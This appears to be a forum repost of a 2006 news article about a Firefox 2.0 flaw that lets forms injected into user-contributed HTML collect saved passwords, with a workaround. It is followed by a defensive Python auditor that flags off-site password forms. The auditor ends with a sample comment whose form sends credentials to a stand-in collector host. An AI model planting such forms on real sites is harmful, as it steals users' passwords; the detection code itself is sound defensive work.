Godlike Productions - Discussion Forum
Subject Firefox flaw enables hackers to steal passwords
Original Message Thursday, 23 November 2006

One of the things that users like about Firefox - its ability to remember passwords - has suddenly become a liability because of a new vulnerability that allows hackers to steal previously saved passwords.

The vulnerability, which affects the latest release of Firefox, version 2.0, has been called a reverse cross-site request (RCSR) by its discoverer Robert Chapin, a Microsoft Certified Engineer.

According to Chapin, the flaw could affect anyone visiting a weblog or forum website that allows user-contributed HTML codes to be added.

Basically, what can occur is that a hacker can put up a fake form on a trusted site like MySpace (which has reportedly already occurred) and users simply have to click on the form for their saved passwords to be transmitted to the hacker's website. Worse still, a hacker can put up an invisible form on a page and users can unwittingly transmit their passwords by clicking on the part of the page that contains the invisible form.

On his website, Chapin says that Internet Explorer 7 users could also be vulnerable to such attacks but less so because passwords will not automatically be transmitted in Internet Explorer unless the RCSR form appears on the same page as a legitimate login form.

The good news for Firefox users is that the problem is easily fixed until a patch is made available. They can simply untick the "remember passwords for sites" box, which is accessible from the Tools menu by selecting Options, then Security.

[link to www.itwire.com.au]
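
The weakness described in the article depends on a site rendering user-contributed HTML that contains a form posting somewhere else. The following is an added example, not code from the article or from Chapin's write-up: a server-side check a forum operator could run on submitted markup before publishing it. The hostnames `forum.example` and `collector.example` and all function and class names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    """(scheme, host, port) for the same-origin test; an explicit default port counts as different."""
    p = urlsplit(url)
    return (p.scheme.lower(), (p.hostname or "").lower(), p.port)

class CredentialFormAuditor(HTMLParser):
    """Flags forms in user-contributed HTML that hold a password field and post off-site."""
    def __init__(self, page_url):
        super().__init__()
        # findings: submit targets of flagged forms; _form: state of the form currently open
        self.page_url, self.findings, self._form = page_url, [], None

    def _is_foreign(self, action):
        try:
            return origin(urljoin(self.page_url, action)) != origin(self.page_url)
        except ValueError:   # malformed URL: treat as foreign
            return True

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "form" and self._form is None:   # browsers ignore a nested <form>
            action = attrs.get("action", "").strip()  # empty or relative action stays on-site
            self._form = {"action": action, "foreign": self._is_foreign(action), "password": False}
        elif tag == "input" and self._form is not None:
            if attrs.get("type", "").strip().lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.flush_form()

    def flush_form(self):
        if self._form and self._form["foreign"] and self._form["password"]:
            self.findings.append(self._form["action"])
        self._form = None

def audit_user_html(html, page_url):
    auditor = CredentialFormAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    auditor.flush_form()   # an unclosed <form> still renders, so evaluate it too
    return auditor.findings

# Constructed sample: a forum comment carrying a form that posts off-site.
SAMPLE_COMMENT = ('<p>nice post</p><form action="https://collector.example/save">'
                  '<input name="user"><input type="password" name="pass"></form>')
```

The check covers only the form's `action` attribute; a site that allows newer markup would need the same test on per-button `formaction` overrides, and the simplest policy remains stripping `<form>` and `<input>` from user content altogether.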